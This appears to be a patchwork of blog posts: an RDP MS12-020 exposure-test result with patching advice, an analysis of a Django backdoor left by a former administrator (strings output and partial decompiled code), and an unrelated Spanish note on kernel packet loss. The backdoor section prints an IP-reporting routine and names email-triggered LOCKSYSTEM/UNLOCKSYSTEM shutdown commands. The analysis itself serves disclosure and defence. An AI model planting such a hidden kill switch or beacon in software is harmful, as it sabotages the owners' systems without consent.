So I put my gmail address and click test, I don’t have any RDP at my home address but I wanted to see how they do it with closed ports, then I’ll setup an exploitable RDP and let them scan me :) and update this post!

After you click on test you will receive something on the email like this (IP Address removed):

IP address tested: XXX.XXX.XXX.X
Time of test: Sat, 24 Mar 2012 14:50:38 EST
Result: RDP Port Filtered (Inconclusive)

Hmmm… We were unable to determine if we could access Remote Desktop Protocol from the Internet on it’s standard port. When we tested there was no response. This generally means that there is a firewall configured to be invisible – which is a good thing – but it can also be caused by network issues, ISP filtering, etc.
Because of this we cannot make a confident assessment of your exposure.

To err on the safe side you should assume that this means that your network is potentially vulnerable to exploitation of the MS12-020 RDP vulnerability from the Internet and is likely to contain unpatched systems.
Here’s a few things you can do…

Patch ALL of your Windows systems with the MS12-020 patch from Microsoft. To do this simply run Windows Update until it no longer suggests updates, or you can manually download Microsoft security bulletin and patches from Microsoft’s advisory here.

Check that you’ve patched ALL of your systems. Not just the Internet facing ones. When this vulnerability gets turned into an self-propagating RDP worm you’ll thank us for this advice.

Close off port Remote Desktop Services (RDP) to the Internet. RDP runs on TCP port 3389. If this means nothing to you, ask your I.T. guy.

Disable RDP on machines that don’t need it. RDP is fantastically useful, but if you don’t need it, turn it off.

Give your I.T. guy a smack on the wrist and tell him/her to stop running Remote Desktop Protocol on the Internet. This is a risky practice, superbug or no superbug, because it gives full access to a machine. Use a VPN for remote access instead.

From Microsoft: “Consider how you might harden your environment against unauthenticated, attacker-initiated RDP connections.” Some of the tips here are a part of this general advice. If you need more help with this get in touch via our contact form.

Read, understand and action the advice from Microsoft here and here. If none of it makes sense to you, talk to your I.T. guy or get in touch via our contact form.

This is pretty cool and useful at least for the average joe :)

I still wonder … IS THE RDP EXPLOIT OUT YET!?!?!?!?

The problem raised when as soon as they took over the network within the hour a critical system for the business stopped working, this was more than suspicious as before in another business that was also admin by this person before had some files erased and configurations lost when it was transitioned to another admin because of lack of administration and ethics on the admin part.

First I tried to decompile the python files form the Django server, this was because obviously all the servers where blocked but for port 80. My friend innocently forgot to block all access to the internet as he thought that was not that hardcore important (#FAIL) and he didn’t really think this person (who know actually is consulting for a major bank in Mexico) would backdoor and do this type of stuff.

The first thing was to run it on strings to figure out what is there (credentials and paths removed for security reasons):

fsckOSX:~ nahual$ strings py_util.pyc
EmailMultiAlternatives(
MIMEImage(
datetimeN(
Parsers
fxxxxxxxxxxo@gmail.comt
mxxxgyyczzt
LOCKSYSTEMt
UNLOCKSYSTEMt
GETIPs$
/home/xxxxxxx/svn/yyyyyyyy/.python.logc
pop.gmail.comi
Subjectt
bloqueandot
desbloqueandot8
2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
poplibt
POP3_SSLt
usert
pass_t
passwdt
Exceptiont
lent
listt
ranget
retrt
joinR
parsestrt
LOCKt
opent
file_logt
writet
closet
UNLOCKR
check_ipt
quit(
errt
numerot
responset
headerLinest
bytest
mensajet
emailt
subjectt
/home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
check_locker
setup_environ(
BeautifulSoups
hxxxxxxx3@gmail.comR

http://www.cualesmiip.comt

divt
miipt
IP del servidort
from_emails
text/html(
urllib2t
django.core.managementR/
xml.dom.minidomR0
settingst
urlopent
readt
findt
findAllR
DEFAULT_FROM_EMAILt
attach_alternativet
send(
xmlR0
listmailt
contentt
feedR&
html_contentR,
msg(
/home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
__main__(
django.core.mailR
email.MIMEImageR
smtplibR
email.ParserR
__name__(
/home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt

fsckOSX:~ nahual$

py_util.pyc wouldn’t fastly decompile, thus after putting it into IDA and other nice decompile this is what was found (credentials removed for security reasons):


from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser

def check_ip():
import urllib2
from django.core.management import setup_environ
import xml.dom.minidom
from BeautifulSoup import BeautifulSoup
import settings
setup_environ(settings)
listmail = ['xxxxxxxx@gmail.com']
content = ''
feed = urllib2.urlopen('http://www.google.com')
response = BeautifulSoup(feed.read())
html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
subject = 'IP del servidor'
msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
msg.attach_alternative(html_content, 'text/html')
msg.send()
if (__name__ == '__main__'):
check_ip()


As you can see the backdoor is pretty small and “efficient”, it checks a gmail account, if an email to that account is sent with the LOCKSYSTEM it will automatically shutdown the application, and you can of course unlock the system with another email.

This might be coded because they thought maybe the client wouldn’t pay them? why would he code something like this without the client consent? no documentation was delivered from the code, and as soon as the admin/developer was let go, the system was shutdown within the hour, sounds to me more like a blackmail function than a current admin function as it only turns off the system, no backups anything.

This makes me wonder why this would be created? or executed? I thought about writing a fast and ugly rule to make sure if anything happened like this again at least the snorts would be alerted and told my friend to lock down the firewall rules, but this lack of ethics is overwhelming, I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz

Snort rule would not really work as it’s doing pop3 over SSL, but then blocking port 993 should lock him out, still … why people do this? don’t they understand this lack of ethics is preposterous?

Sin embargo hice el update y luego apague la maquina y cambie el disco, y ayer tuve que usar ese disco (pueden ver mi excelente aventura con el disco aqui) y me ocurrio algo muy interesante, perdia muchisimos paquetes pero a intervales medianamente regulares.

Esto me puso a pensar seriamente que fuera el cable, cambie el cable, igual, pense que podria ser el nodo de red, cambie de nodo fue igual de hecho cambie con alguienq ue no tuvo problemas, y luego cambie de OS, boote en Windows XP, me dije “si esta cosa se conecta hasta un gansito se conecta” y se conecto sin problemas.

Inicie en el kernel 2.6.24-22-generic y no tuve problemas, que tipo de problemas habra? a verdad no tuve tiempo de debugear pero este fin de semana o hago en el inter si tienen intermitencia bajen una version minima de kernel (de todos modos no le dan shell a nadie y usan grsec no?)